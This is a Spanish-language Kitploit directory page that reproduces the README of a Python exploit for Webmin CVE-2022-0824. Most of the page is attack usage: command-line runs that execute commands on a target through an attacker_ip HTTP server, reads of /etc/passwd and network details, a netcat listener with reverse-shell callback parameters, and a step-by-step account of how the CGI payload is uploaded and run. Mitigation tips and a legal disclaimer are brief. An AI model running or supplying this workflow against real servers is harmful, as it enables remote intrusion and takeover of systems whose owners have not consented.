Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — Exploit en Python para Webmin CVE-2022-0824 con soporte de modo dual: ejecución directa de comandos y shell reversa. Incluye múltiples tipos de payload, gestión inteligente de archivos y registro detallado de depuración para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoGeneración de Shellcode

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Exploit en Python para Webmin CVE-2022-0824 con soporte de modo dual: ejecución directa de comandos y shell reversa. Incluye múltiples tipos de payload, gestión inteligente de archivos y registro detallado de depuración para pruebas de seguridad autorizadas.

Ver Repositorio
hace 1 añoAún no revisado

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Herramienta de explotación mejorada para Webmin CVE-2022-0824 - Soporta modo de ejecución de comandos y modo de shell inversa

Python Version License CVE

[!IMPORTANT]

Una herramienta de explotación mejorada para la vulnerabilidad CVE-2022-0824 en Webmin, que soporta dos modos: ejecución directa de comandos y shell inversa.

🚀 Características

  • ✅ Soporte de doble modo: Modo de ejecución de comandos + Modo de shell inversa
  • ✅ Múltiples payloads: Tres payloads diferentes: Perl, Bash, Python
  • ✅ Gestión inteligente de archivos: Generación automática de nombres de archivo únicos para evitar conflictos
  • ✅ Subida forzada con sobrescritura: Manejo automático de la sobrescritura de archivos existentes
  • ✅ Múltiples métodos de subida: Descarga HTTP, subida directa, creación mediante comandos
  • ✅ Información de depuración detallada: Registro completo del proceso de ejecución
  • ✅ Interfaz amigable: Salida a color e indicadores de estado claros

📋 Información de la vulnerabilidad

  • ID CVE: CVE-2022-0824
  • Versiones afectadas: Webmin < 1.990
  • Tipo de vulnerabilidad: Ejecución remota de código por subida arbitraria de archivos
  • Puntuación CVSS: 9.8 (Crítica)

🛠️ Requisitos de instalación

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 Modo de uso

Modo de ejecución de comandos (recomendado)

root@kitploit:~
# Ejecución básica de comandos
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# Ver información del sistema
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# Listar archivos
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# Ver archivos sensibles
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# Información de red
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

Modo de shell inversa

root@kitploit:~
# 1. Iniciar el listener
nc -nlvp 9999

# 2. Ejecutar el exploit
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 Descripción de parámetros

*Nota: Obligatorio en el modo de shell inversa

🎯 Ejemplos de uso

Ejemplo 1: Recopilación de información del sistema

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

Ejemplo 2: Exploración del sistema de archivos

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

Ejemplo 3: Ver configuración de red

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 Cómo funciona

  1. Autenticación: Inicia sesión en la interfaz de administración de Webmin con las credenciales proporcionadas.
  2. Generación del payload: Genera un script CGI según el modo seleccionado.
  3. Subida del archivo: Sube el payload mediante la función de descarga HTTP del administrador de archivos.
  4. Establecimiento de permisos: Configura los permisos de ejecución del archivo subido.
  5. Ejecución de comandos: Accede al script CGI subido para ejecutar comandos o establecer una conexión inversa.

🛡️ Recomendaciones de protección

  • Actualizar Webmin a la última versión (>= 1.990)
  • Restringir el acceso de red a la interfaz de administración de Webmin
  • Usar contraseñas seguras y autenticación de dos factores
  • Auditar periódicamente los registros del sistema
  • Implementar un firewall de aplicaciones web (WAF)

⚠️ Aviso legal

Esta herramienta está destinada únicamente para pruebas de seguridad autorizadas y fines educativos.

  • 🚫 Prohibido su uso en sistemas no autorizados
  • 🚫 Prohibido su uso para ataques maliciosos
  • 🚫 El usuario asume la responsabilidad legal correspondiente
  • ✅ Usar solo en entornos con autorización explícita
  • ✅ Para investigación de seguridad y verificación de vulnerabilidades

📚 Detalles técnicos

Tipos de payload

  • Perl CGI: Payload principal, mejor compatibilidad
  • Bash CGI: Payload alternativo, adecuado para sistemas Linux
  • Python CGI: Payload alternativo, con la funcionalidad más rica

Métodos de subida

  1. Descarga HTTP: A través de la función de descarga remota del administrador de archivos de Webmin
  2. Subida directa: A través de la interfaz de subida de archivos
  3. Creación por comando: Creación del archivo mediante comandos del sistema

Estrategia de nomenclatura de archivos

  • Hash MD5 basado en el contenido del comando
  • Sufijo de marca de tiempo
  • Garantiza el uso de un nombre de archivo diferente en cada ejecución

🔄 Registro de cambios

v5.0 (2025-08-05)

  • ✨ Nuevo modo de ejecución de comandos
  • 🐛 Corregido problema de sobrescritura de archivos
  • 🔧 Mejorada la estrategia de nomenclatura de archivos
  • 📈 Mejorado el manejo de errores

v4.0 (Basado en original)

  • 🎯 Basado en el código original de faisalfs10x
  • 🔧 Mejorada la compatibilidad con CGI
  • 📝 Añadido registro detallado

🤝 Contribuciones

¡Bienvenidos Issues y Pull Requests!

  1. Haz un Fork de este proyecto
  2. Crea una rama de características (git checkout -b feature/AmazingFeature)
  3. Realiza los cambios (git commit -m 'Add some AmazingFeature')
  4. Sube los cambios (git push origin feature/AmazingFeature)
  5. Abre un Pull Request

📄 Licencia

Este proyecto está bajo la licencia MIT - consulta el archivo LICENSE para más detalles

🙏 Agradecimientos

  • Autor del código original: @faisalfs10x
  • Proyecto original: Webmin-CVE-2022-0824-revshell
  • Descubridor del CVE: Investigadores de seguridad relacionados

📞 Contacto

Si tienes preguntas o sugerencias, contacta a través de:

  • 📧 Abriendo un Issue en GitHub
  • 🐛 Para reportar problemas de seguridad, envía un mensaje privado

⭐ ¡Si este proyecto te resulta útil, dale una estrella para apoyarlo!

🔗 Enlaces relacionados

  • Detalles de CVE-2022-0824
  • Sitio oficial de Webmin
  • Proyecto original

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
Descargar herramienta
ParámetroDescripciónObligatorioEjemplo
-t, --targetURL objetivo de Webmin✅http://192.168.1.100:10000/
-c, --credentialCredenciales de inicio de sesión✅admin:password
-LS, --py3http_serverDirección del servidor HTTP✅192.168.1.50:8080
--shellComando a ejecutar❌"ls -la"
-L, --callback_ipIP para la shell inversa❌*192.168.1.50
-P, --callback_portPuerto para la shell inversa❌*9999